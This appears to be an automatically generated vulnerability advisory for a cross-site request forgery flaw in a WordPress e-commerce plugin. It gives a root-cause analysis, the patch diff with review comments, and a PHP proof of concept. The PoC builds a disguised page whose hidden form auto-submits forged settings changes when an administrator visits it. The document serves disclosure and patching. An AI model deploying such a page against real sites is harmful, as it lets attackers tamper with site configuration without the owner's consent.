Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-1208: Friendly Functions for Welcart <= 1.2.5 – Cross-Site Request Forgery to Settings Update (friendly-functions-for-welcart)

CVE ID CVE-2026-1208
Severity Medium (CVSS 4.3)
CWE 352
Vulnerable Version 1.2.5
Patched Version 1.2.6
Disclosed January 22, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1208:
This vulnerability is a Cross-Site Request Forgery (CSRF) flaw in the Friendly Functions for Welcart WordPress plugin versions 1.2.5 and earlier. The vulnerability exists in the plugin’s settings update functionality, allowing unauthenticated attackers to modify plugin configurations by tricking an administrator into submitting a malicious request. The CVSS score of 4.3 reflects a medium-severity attack that requires user interaction but has no authentication requirements.

Atomic Edge research identifies the root cause as missing nonce validation during the initial request processing in the settings page handler. The vulnerable code resides in the file `friendly-functions-for-welcart/ffw_function_settings.php`. Before the patch, the plugin only performed nonce validation inside the conditional block that checked for `$_POST['submit_settings']` at line 54. This validation occurred after the plugin had already begun processing the request and loading option data. The security check used `check_admin_referer('ffw_settings_nonce')`, but because it ran only at that late point, a forged request carrying the expected parameters was processed before the check could reject it.

The exploitation method involves an attacker creating a malicious web page or link that submits a forged POST request to the WordPress admin area where the plugin’s settings page is loaded. The target endpoint is the plugin’s settings page, typically accessed via the WordPress admin menu. The attacker crafts a request containing the `submit_settings` parameter along with other plugin configuration parameters they wish to modify. When an administrator with appropriate privileges visits the attacker’s page while authenticated to their WordPress site, the forged request executes, changing plugin settings without the administrator’s knowledge or consent.

The patch moves the nonce validation earlier in the execution flow. The fix adds a new security check at lines 9-14 in `ffw_function_settings.php` that executes before any plugin data processing begins. This new validation checks for the presence of `$_POST['submit_settings']` and immediately validates the nonce using `check_admin_referer('ffw_settings_nonce')`. If validation fails, the script terminates with `wp_die()`. The patch also removes the now-duplicate nonce check from lines 54-58, leaving no execution path that reaches settings processing without passing the early validation. The version number increments from 1.2.5 to 1.2.6 in the main plugin file.
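The ordering problem described above, shown as an added illustration rather than the plugin's own code: a minimal WordPress settings handler in the vulnerable shape (option data processed before the nonce check) next to the fixed shape (capability and nonce verified before anything is written). The option name `ffw_example_data`, the field `shop_notice`, the text domain `ffw-example` and both function names are hypothetical.

```php
<?php
// Added example, not code from Friendly Functions for Welcart.
// Option key, field names, text domain and function names are hypothetical.

// VULNERABLE SHAPE: option data is loaded and written as soon as
// submit_settings is present; the nonce check only runs afterwards,
// so a forged POST has already been applied by the time it fires.
function ffw_example_settings_handler_before() {
    $data = get_option('ffw_example_data', array());
    if (isset($_POST['submit_settings'])) {
        $data['shop_notice'] = sanitize_text_field(wp_unslash($_POST['shop_notice'] ?? ''));
        update_option('ffw_example_data', $data);   // already persisted
    }
    // ... page rendering ...
    if (isset($_POST['submit_settings'])) {
        check_admin_referer('ffw_settings_nonce');  // too late to help
    }
}

// FIXED SHAPE: authorization and nonce verification gate every write.
function ffw_example_settings_handler_after() {
    if (isset($_POST['submit_settings'])) {
        // Only users allowed to manage options may save settings.
        if (!current_user_can('manage_options')) {
            wp_die(esc_html__('Insufficient permissions', 'ffw-example'));
        }
        // check_admin_referer() calls wp_die() itself when the nonce is
        // missing or invalid, so nothing below runs for a forged request.
        check_admin_referer('ffw_settings_nonce');
        $data = get_option('ffw_example_data', array());
        $data['shop_notice'] = sanitize_text_field(wp_unslash($_POST['shop_notice'] ?? ''));
        update_option('ffw_example_data', $data);
    }
    $current = get_option('ffw_example_data', array());
    // The form must emit the matching nonce so legitimate saves still pass.
    ?>
    <form method="post">
        <?php wp_nonce_field('ffw_settings_nonce'); ?>
        <input type="text" name="shop_notice"
               value="<?php echo esc_attr($current['shop_notice'] ?? ''); ?>" />
        <?php submit_button(esc_html__('Save', 'ffw-example'), 'primary', 'submit_settings'); ?>
    </form>
    <?php
}
```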

Successful exploitation allows attackers to modify all plugin settings controlled through the settings interface. Depending on the plugin’s functionality, this could include changing e-commerce behaviors, modifying display settings, or altering integration parameters. While the vulnerability does not provide direct code execution or data extraction, unauthorized configuration changes could disrupt site functionality, affect user experience, or enable secondary attacks through misconfigured components. The impact is limited to the plugin’s configuration scope but could have business consequences for sites relying on Welcart e-commerce functionality.

Differential between vulnerable and patched code

Code Diff
--- a/friendly-functions-for-welcart/ffw_function_settings.php
+++ b/friendly-functions-for-welcart/ffw_function_settings.php
@@ -9,6 +9,12 @@
 include_once(ABSPATH . 'wp-admin/includes/plugin.php');
 if (is_plugin_active('usc-e-shop/usc-e-shop.php')):

+//Nonceチェック
+if(
+	isset($_POST['submit_settings']) &&
+	!check_admin_referer('ffw_settings_nonce')
+) wp_die(__('Security check failed', 'text-domain'));
+
 /* 設定情報 */
 //取得
 $friendlyFunctionsForWelcartData = get_option('friendlyFunctionsForWelcartData');
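Review bot: the `!check_admin_referer('ffw_settings_nonce')` branch is effectively unreachable, because `check_admin_referer()` with a named action already terminates the request via `wp_nonce_ays()`/`wp_die()` on a missing or invalid nonce; the extra `wp_die()` is harmless defence in depth, but `'text-domain'` is the generic placeholder rather than the plugin's own text domain, so the message will not be translated. Two things to confirm from this placement: the check sits inside the `if (is_plugin_active('usc-e-shop/usc-e-shop.php')):` branch, so no save logic may exist outside that branch, and no capability check is visible in the hunk, so the settings page's registered capability must be what restricts who can reach this code.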
@@ -54,10 +60,6 @@

 //設定保存時のメッセージ
 if(isset($_POST['submit_settings'])){
-	//Nonceチェック
-	if(!check_admin_referer('ffw_settings_nonce')){
-        wp_die(__('Security check failed', 'text-domain'));
-    }
 	$saveMessage = '<div class="saveMessage updated"><p>'.sprintf(esc_html__('%s saved.', MAINICHI_WEB_THIS_PLUGIN_NAME), sanitize_text_field($_POST['submit_settings'])).'</p></div>'; // ~を保存しました。
 }
 ?>
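Review bot: removing the second nonce check is fine only because the early check in the hunk above now runs the same `check_admin_referer('ffw_settings_nonce')` before any processing; the save-message path depends entirely on it. Separately, the remaining line builds HTML from `sanitize_text_field($_POST['submit_settings'])`; `sanitize_text_field()` is an input sanitizer, so follow the WordPress escaping convention and escape at output, e.g. `esc_html(wp_unslash($_POST['submit_settings']))`.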
--- a/friendly-functions-for-welcart/friendly-functions-for-welcart.php
+++ b/friendly-functions-for-welcart/friendly-functions-for-welcart.php
@@ -10,7 +10,7 @@
 Requires PHP: 7.2
 License: GPLv2 or later
 License URI: https://www.gnu.org/licenses/gpl-2.0.html
-Version: 1.2.5
+Version: 1.2.6
 */

 if(!defined('ABSPATH')) exit;

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1208 - Friendly Functions for Welcart <= 1.2.5 - Cross-Site Request Forgery to Settings Update
// (The opening PHP tag is placed before this header so the comment lines are
// not emitted as literal text ahead of the generated HTML.)

/**
 * Proof of Concept for CVE-2026-1208
 * CSRF against Friendly Functions for Welcart WordPress plugin <= 1.2.5
 * 
 * This script generates an HTML page that submits a forged POST request
 * to the vulnerable plugin's settings page when visited by an authenticated admin.
 * The payload attempts to modify plugin settings via CSRF.
 */

// Configuration - Set the target WordPress admin URL
$target_url = 'https://vulnerable-site.com/wp-admin/admin.php?page=ffw_settings';

// Generate a unique form ID to avoid collisions
$form_id = uniqid('csrf_');

?>
<!DOCTYPE html>
<html>
<head>
    <title>Document Preview</title>
    <style>
        body { font-family: Arial, sans-serif; margin: 40px; }
        .hidden { display: none; }
        .info { background: #f0f0f0; padding: 15px; border-radius: 5px; margin-bottom: 20px; }
    </style>
</head>
<body>
    <div class="info">
        <h2>Atomic Edge CVE Research - Proof of Concept</h2>
        <p><strong>CVE-2026-1208:</strong> Friendly Functions for Welcart CSRF to Settings Update</p>
        <p>This page demonstrates a CSRF attack against vulnerable plugin versions (<=1.2.5).</p>
        <p>When visited by an authenticated WordPress administrator, this page will automatically submit a forged request to modify plugin settings.</p>
        <p><strong>Target URL:</strong> <?php echo htmlspecialchars($target_url); ?></p>
    </div>
    
    <form id="<?php echo $form_id; ?>" method="POST" action="<?php echo htmlspecialchars($target_url); ?>" class="hidden">
        <!-- The submit_settings parameter triggers the settings save functionality -->
        <input type="hidden" name="submit_settings" value="Settings" />
        
        <!-- Example: Attempt to modify plugin configuration options -->
        <!-- These parameter names would need to be determined from the actual plugin code -->
        <input type="hidden" name="ffw_option_1" value="malicious_value_1" />
        <input type="hidden" name="ffw_option_2" value="malicious_value_2" />
        <input type="hidden" name="ffw_enable_feature" value="0" />
        
        <!-- The nonce field is intentionally omitted to exploit the vulnerability -->
        <!-- Vulnerable versions do not validate nonce presence before processing -->
    </form>
    
    <script>
        // Auto-submit the form when the page loads
        document.addEventListener('DOMContentLoaded', function() {
            console.log('Atomic Edge PoC: Submitting CSRF payload to target...');
            document.getElementById('<?php echo $form_id; ?>').submit();
        });
    </script>
</body>
</html>
